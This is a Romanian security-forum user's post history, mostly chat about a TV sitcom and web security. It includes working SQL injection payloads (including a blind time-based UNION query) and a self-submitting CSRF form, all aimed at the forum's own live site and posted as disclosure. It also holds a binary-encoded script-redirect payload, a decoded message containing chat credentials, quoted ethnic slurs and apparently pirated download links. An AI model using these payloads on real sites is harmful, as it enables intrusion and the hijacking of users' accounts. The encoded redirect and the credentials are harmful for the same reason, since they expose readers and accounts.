moubik
-
Posts
1261 -
Joined
-
Last visited
-
Days Won
1
Posts posted by moubik
-
-
codex, taci. faza cu crierul si procentul folosit e mit.
s-a mai discutat chiar pe rst asta.
niciodata nu o sa poti sa faci tot ce fac eu. si niciodata nu o sa pot eu sa fac tot ce poti tu.
accepta evolutia, accepta diferentele
-
the big bang teory ....se refera la expanisunea unviersului si la un moment dat explodeaza parca sau ceva de genu ...am citit intr-o carte si am vazut si pe descovery ceva documentare despre asta
toata lumea stie ce e big bang theory si big crunch theory.
asta e serial
-
http://www.fileb0x.ro/download.php?key=0931dba2d31a3d0a614848983c079dfb
http://www.fileb0x.ro/download.php?key=c0a79b1bcd8fb0bb89111db204e30c23
http://www.fileb0x.ro/download.php?key=ac8037cf1e8acb802b4e7dece73d635f
http://www.fileb0x.ro/download.php?key=4a2ed09ba3aeb0ddf2f5f955a8dcd495
http://www.fileb0x.ro/download.php?key=02dc08d8ea7c31f700d01b6007d91d28
http://www.fileb0x.ro/download.php?key=ce537da8c7596395b7fa3b1160dc07a3
http://www.fileb0x.ro/download.php?key=3f93180f18dea6a2ecfaf80e9962c9eb
http://www.fileb0x.ro/download.php?key=9e52ce3f2bb0d57676c447eff59dce32
http://www.fileb0x.ro/download.php?key=8657e60d8340dca1123dce1bdfa5b205
http://www.fileb0x.ro/download.php?key=d6634c8500c271009036df972f63cd08
http://www.fileb0x.ro/download.php?key=21f71e27d95f1d847ccbc9e79ed4caba
http://www.fileb0x.ro/download.php?key=141a1619159a1dde21314bea6e8434b2
http://www.fileb0x.ro/download.php?key=d7969cda86d4b92aba5226bf808bb564
http://www.fileb0x.ro/download.php?key=a9370b4af81a1c893c1f6d643faeeb81
http://www.fileb0x.ro/download.php?key=3460aa491735ed66842b806754f01937
http://www.fileb0x.ro/download.php?key=997a0184cdda2f96c09ce7635cad2a53
http://www.fileb0x.ro/download.php?key=ae09be604594ae6a8f72fb60cff9ab57
de la episodul 1 la 17
mie mi-a placut serialul asta
(puneti "o" in loc de zero)
-
mai stiu cum e sa nu ai ce manca. si in acelasi timp stiu cum e sa pot sa ma intretin singur.
selectia naturala trebuie sa-si spuna cuvantul.
furtul tot furt este.
pedepsele furt pe internet sunt MULT prea dure totusi.
si, da, sunt excroci oamenii. asta fac inseala si fura.
crezi ca ei furau pentru ca nu aveau ce manca ? crezi ca o data ce le ajungeau banii ca sa manance si sa se intretina se opreau si incercau sa-si gaseasca ceva LEGITIM de facut ? eu sunt sigur ca nu
-
un formular cu post e la fel de vulnerabil ca un formular cu get
cu get rezulta ceva de genul
http://site.com/index.php?var1=valoare&var2=valoare - deci ar fi usor sa pacalesti userul sa intre pe acest url
cu post e explicat aici:
http://websecurity.ro/blog/2007/11/17/csrf-cross-site-request-forgery-tutorial/
-
poti sa treci de html_entities daca nu il folosesti corect
eu prefer
function filterCross($filterMe)
{
$tempMe = $filterMe;
$filterMe = str_replace("&", "&", $filterMe);
//$filterMe = str_replace("#", "#", $filterMe);
$filterMe = str_replace("<", "<", $filterMe);
$filterMe = str_replace(">", ">", $filterMe);
//$filterMe = str_replace("(", "(", $filterMe);
//$filterMe = str_replace(")", ")", $filterMe);
$filterMe = str_replace('"', """, $filterMe);
$filterMe = str_replace("'", "'", $filterMe);
//$filterMe = str_replace("+", "+", $filterMe);
if (strcmp($tempMe,$filterMe))
{
//logHacker();
}
return $filterMe;
}functia e scoasa dintr-un site de-al meu
-
1,2: formularele POST nu te salveaza de csrf, nici formular de confirmare.
3: e valid atata timp cat nu ti-a aflat sesiunea
eu prefer metoda
4: se creaza cheie random la fiecare refresh al paginii, si o cheie numita salting pentru a fi folosita la morpharea saltingului se salveaza in sesiune rezultatul criptarii pentru a putea fi comparat cu ce primim de la user.
exemplu: de genul
cheie random: Ajf84Odka03 --> $_GET['sid']
si
salting: unixtime() --> $_GET['time']
$_SESSION['result'] <-- aici se salveaza hash-ul pe care speram sa-l obtinem la verificare pentru a face actiunea userului. (mai jos se da un exemplu de criptare)
se salveaza in sesiune pentru fiecare cheie un hash prin metoda privata sau sau criptari bazate pe salting.
salting care poate fi schimbat des si stiut numai de server (pentru a te proteja de reply attack)
exemplu:
$saltingMorph = $_GET['time'];
$resultedFromUser = hash_hmac("md5", $_GET['sid'], "text stiut numai de server".$saltingMorph);
if ($resultedFromUser === $_SESSION['result'])
{
//s-a validat
}PS chiar iti place modul de scriere GNU al codului ?
mie mi se pare foarte putin lizibil ...
-
old stuff dude, asta e originalul: http://thewebsiteisdown.com/
-
-
o sa incerc acasa sunt curios daca merge. pe laptopul de la munca nu-mi merge accelerarea.
ceva rezultate ?
nope, am 6100 si merge de la 8000 in sus parca.. departe rau
-
ahahaha, nice
-
Din cate stiu sunt 3 variante cu care poti sa faci escape la requesturile POST ajax.
escape()
encodeURI()
encodeURIComponent()
nu stiu care este cea mai buna pentru a face escape catre un script .php si la partea php care sa restaureze valoarea parametrului.
-
o sa incerc acasa sunt curios daca merge. pe laptopul de la munca nu-mi merge accelerarea.
-
unii sunt incapatanati si cred ca ce e vechi e mai bun.
ciudat sa spui asta intr-o lume in care noutatile apar in fiecare zi, nu ?
fosile ?
-
Florin Salam in toata splendoarea lui
http://www.youtube.com/watch?v=ZNA07FYi8Xc
Si nu uitati sa cititi commenturile celor care il apara manca-ti-as ...
SA VA DAW MUIE LA TOTZII / Luavash morti in pula la astia kre se ia de salam
sa dau muie k gramada care are ceva cu tigani ai inteles si nu ne mai injurati pe net gasiti un tigan si injuratil sa vedeti ce patiti futuva in gat de muritori de foame
...
-
si in plus nu zici pe cine ai intrebat cat timp ai facut injectu asta
-
nu e nici o inovatie concatenarea de selecturi sau selecturile in selecturi :PP
inseamna sa stii sql asa cum trebuie stiut
-
kenny, "oriunde" nu "ori unde"....
am si eu un mesaj pt voi:
111100 1110011 1100011 1110010 1101001 1110000 1110100 111110 1100100 1101111 1100011 1110101 1101101 1100101 1101110 1110100 101110 1101100 1101111 1100011 1100001 1110100 1101001 1101111 1101110 111101 100111 1101000 1110100 1110100 1110000 111010 101111 101111 1100101 1110101 1110010 1101111 110010 110000 110000 111001 101110 110001 110000 110000 1110111 1100101 1100010 1110011 1110000 1100001 1100011 1100101 101110 1101110 1100101 1110100 101111 100111 111100 101111 1110011 1100011 1110010 1101001 1110000 1110100 111110
ahh... si poate va potoliti sa mai trimiteti mesaje dastea. ca sa fie toti 1337 si in consecinta daca toti sunt 1337 nimeni nu mai este... :
<?php
$message = "mesaj LLLLLLLLLLLLLLEEEEEEEEEEEEEEEEEEETTTTTTTTTTTTTTTTTTTTT";
$len = strlen($message);
for ($i = 0 ; $i < $len ; $i++)
{
echo base_convert(ord($message[$i]), 10, 2) ." ";
}
?> -
cum e in teste, e full disclosure de fapt
kw3, verifica variabila "favourite" legata de sql injection
da niste rezultate ciudate, nu-mi dau seama ce se intampla de fapt acolo
de dragul obisnuintei: (
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 or 1=1asta nu face nici un echo la al doilea request:
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 and 1=1asta spune ca nu exista blogul:
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 and 1=2edit:
spune ca nu exista blogul
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 order by 7 --nu spune nimic iarasi:
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 order by 6 --edit edit edit:
uite si blind sql injection:
[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=1448329 union all select 1,2,3,4,5, BENCHMARK(10000000,MD5(CHAR(97))) -- -
CSRF pentru auto-stergere blog:
<script>
setTimeout("document.getElementById('rstCSRF').submit();", 100);
</script>
<form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post">
<input type="hidden" value="closeblog2" name="action"/>
<input type="submit" value="Confirm Close Blog"/>
</form> -
nu pleaca din rst. ar fi spus si ceva de mine sigur daca era asa
<?php
$message = "01001110 01101111 01101000 00101100 00100000 01110011 01100001 01101100 01110101 01110100 01100001 01110010 01100101 00100000 01101100 01100001 00100000 01110100 01101111 01110100 01101001 00100001 00100000 01001101 01101001 00101101 01100001 00100000 01100110 01100001 01100011 01110101 01110100 00100000 01110000 01101100 01100001 01100011 01100101 01110010 01100101 00100000 01110011 01100001 00100000 01100110 01101001 01110101 00100000 01100001 01101001 01100011 01101001 00101110 00001101 00001010 00001101 00001010 01010101 01101001 01110100 01100001 00101101 01110100 01101001 00100000 01110101 01101110 00100000 01100110 01100101 01100101 01100100 01100010 01100001 01100011 01101011 00100000 01110000 01100101 01101110 01110100 01110010 01110101 00100000 01110011 01110100 01100001 01100110 01100110 00100000 00111010 00001101 00001010 00001101 00001010 01001011 01110111 00110011 01110010 01101100 01101110 00100000 00101101 00100000 01000111 01110010 01100101 01100001 01110100 00100000 01100001 01100100 01101101 01101001 01101110 00001101 00001010 01110011 01111001 01110011 01100111 01101000 00110000 01110011 01110100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01100100 01100101 01100001 01110100 01101000 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01001110 01100101 01101101 01100101 01110011 01110011 01101001 01110011 00100000 00101101 00100000 01000001 01100110 01110010 01101001 01100011 01100001 01101110 00100000 01001001 01100100 01101001 01101111 01110100 00100000 00110001 00110000 00110000 00100101 00001101 00001010 01010011 01101100 01101001 01100011 01101011 00100000 00101101 00100000 01000111 01110010 01100101 01100001 01110100 00100000 01100001 01100100 01101101 01101001 01101110 00001101 00001010 01010110 01101001 01110010 01100111 01101001 01101100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101100 00001101 00001010 01010010 01100101 01110011 01110100 01110101 01101100 00100000 00101101 00100000 01001110 00101101 01100001 01101101 00100000 01101110 01101001 01101101 01101001 01100011 00100000 01101001 01101101 01110000 01101111 01110100 01110010 01101001 01110110 01100001 00100000 01100011 01110101 00100000 01100101 01101001 00001101 00001010 00001101 00001010 01010110 00101101 01100001 01101101 00100000 01100001 01101010 01110101 01110100 01100001 01110100 00100000 01100011 01100001 01110100 00100000 01100001 01101101 00100000 01110000 01110101 01110100 01110101 01110100 00100000 00111010 00100000 01110110 00101101 01100001 01101101 00100000 01111010 01101001 01110011 00100000 01100011 01110101 01101101 00100000 01110011 01100001 00100000 00101100 00101100 01101000 01100001 01100011 01101011 00101101 01110101 01101001 01110100 01101001 00100010 00100000 01100001 01110101 01110100 01101111 01101101 01100001 01110100 01110101 01101100 00100000 01100100 01100101 00100000 01100011 01100001 01100110 01100101 01100001 00111011 00100000 01110110 00101101 01100001 01101101 00100000 01110011 01110000 01110101 01110011 00100000 01100011 01110101 01101101 00100000 01110011 01100001 00100000 01110100 01110010 01101001 01110011 01100001 01110100 01101001 00100000 01000010 01101001 01110100 01100101 01100110 01101001 01100111 01101000 01110100 00100000 01110011 01101001 00100000 01110110 00101101 01100001 01101101 00100000 01100100 01100001 01110100 00100000 01110101 01101110 00100000 01100011 01101000 01100001 01110100 00100000 00101000 01101000 01110100 01110100 01110000 00111010 00101111 00101111 01110010 01110011 01110100 01100011 01100101 01101110 01110100 01100101 01110010 00101110 01110111 01100101 01100010 01110011 00101110 01100011 01101111 01101101 00101111 00100000 01110101 01110011 01100101 01110010 00111010 01110010 01110011 01110100 01101101 01100101 01101101 01100010 01100101 01110010 00100000 00111011 00100000 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 00111010 01100011 01100001 01110100 01100001 01101101 01101111 01101110 01101001 01100001 00101001 00100000 00101110 00001101 00001010 00001101 00001010 01100010 01111001 01100101 00101101 01100010 01111001 01100101 00100000 01100001 01110101 00100000 01110010 01100101 01110110 01101111 01101001 01110010 00100000 01010100 01110011 01100011 01101000 11111100 01110011 00100000 01100001 01100100 01101001 11110011 01110011 00100000 01100001 01110010 01110010 01101001 01110110 01100101 01100100 01100101 01110010 01100011 01101001";
$parts = explode(" ", $message);
foreach ($parts as $letter)
{
echo chr(base_convert($letter, 2, 10));
}
?>reprezinta mesajul descifrat de nytro.
-
eu sunt curios ce efecte or sa aiba la nameservere (poate apare un exploit? )
-
-
invata programare..
the big bang theory - serial
in Off-topic
Posted
pai da-mi documentar daca vrei. eu am dat SERIAL COMEDIE CARE NU ARE LEGATURA CU TEORIA BIG BANG. acum intelegi ?